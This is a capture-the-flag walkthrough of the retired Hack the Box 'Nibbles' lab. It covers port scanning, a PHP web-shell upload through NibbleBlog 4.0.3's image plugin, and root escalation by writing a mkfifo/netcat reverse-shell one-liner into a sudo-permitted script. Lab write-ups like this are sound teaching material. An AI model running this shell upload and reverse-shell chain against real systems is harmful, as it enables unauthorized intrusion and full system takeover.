HTB – Nibbles

Today we are going to solve another CTF challenge “Nibble” which is categories as retired lab presented by Hack the Box for making online penetration practices.

Level: Easy

Task: find user.txt and root.txt file on the victim’s machine.

Since these labs are online accessible therefore they have static IP. The IP of Nibble is so let’s initiate with nmap port enumeration.

c:\Users\jacco>nmap -T4 -sC -sV
Starting Nmap 7.70 ( ) at 2019-03-12 21:23 W. Europe Standard Time
Nmap scan report for
Host is up (0.031s latency).
Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 19.25 seconds

The Port 80 is open so let’s open IP in out Browser to see that if a website is hosted on the IP. After opening the IP in the browser, we were greeted by the following page.

Then we use curl to send http request on and notice /nibbleblog/ which could be any web directory.

c:\Users\jacco>curl -v
* Rebuilt URL to:
* Trying
* Connected to ( port 80 (#0)
> GET / HTTP/1.1
> Host:
> User-Agent: curl/7.55.1
> Accept: */*
< HTTP/1.1 200 OK
< Date: Wed, 13 Mar 2019 17:25:49 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Last-Modified: Thu, 28 Dec 2017 20:19:50 GMT
< ETag: "5d-5616c3cf7fa77"
< Accept-Ranges: bytes
< Content-Length: 93
< Vary: Accept-Encoding
< Content-Type: text/html
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->
* Connection #0 to host left intact

So we execute the directory put us on the main page of a blogging platform NibbleBlog Yum Yum.

We find the Admin Panel on:


After a couple of tests we find the credentials:


As we see on Settings, the version is: Nibbleblog 4.0.3 “Coffee”
We look for exploits for that version:

Proof of Concept

  1. Obtain Admin credentials (for example via Phishing via XSS which can be gained via CSRF, see advisory about CSRF in NibbleBlog 4.0.3)
  2. Activate My image plugin by visiting http://localhost/nibbleblog/admin.php?controller=plugins&action=install&plugin=my_image
  3. Upload PHP shell, ignore warnings
  4. Visit http://localhost/nibbleblog/content/private/plugins/my_image/image.php. This is the default name of images uploaded via the plugin.

Get shell:

locate webshell
cp /usr/share/webshells/php/php-reverse-shell.php .
#We edit the ip php-reverse-shell.php
nc -lvp 443
#We upload the .php using the plugin my image of nibbleblog

Now let’s finish the task by grabbing user.txt and root.txt file.

nibbler@Nibbles:/home/nibbler$ unzip
creating: personal/
creating: personal/stuff/
inflating: personal/stuff/
nibbler@Nibbles:/home/nibbler$ cd personal
cd personal
nibbler@Nibbles:/home/nibbler/personal$ ls
nibbler@Nibbles:/home/nibbler/personal$ cd stuff
cd stuff
nibbler@Nibbles:/home/nibbler/personal/stuff$ ls -al
ls -al
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10 2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10 2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May 8 2015
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -l
sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
env_reset, mail_badpass,

User nibbler may run the following commands on Nibbles:
(root) NOPASSWD: /home/nibbler/personal/stuff/
nibbler@Nibbles:/home/nibbler/personal/stuff$ echo "mkfifo /tmp/flahty; nc 5555 0</tmp/flahty | /bin/sh >/tmp/flahty 2>&1; rm /tmp/flahty" >
nibbler@Nibbles:/home/nibbler/personal/stuff$ sudo -u root ./
sudo -u root ./

On other, we have a netcat listener, which has provided root access to us. Let’s finish this task and grab the root.txt file………………………………..

C:\Users\jacco>nc -lvp 5555
listening on [any] 5555 ... inverse host lookup failed: h_errno 11004: NO_DATA
connect to [] from (UNKNOWN) [] 43462: NO_DATA

python3 -c 'import pty;pty.spawn("/bin/bash")'
root@Nibbles:~# cd /root
cd /root
root@Nibbles:~# cat root.txt
cat root.txt

Author: Jacco Straathof

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *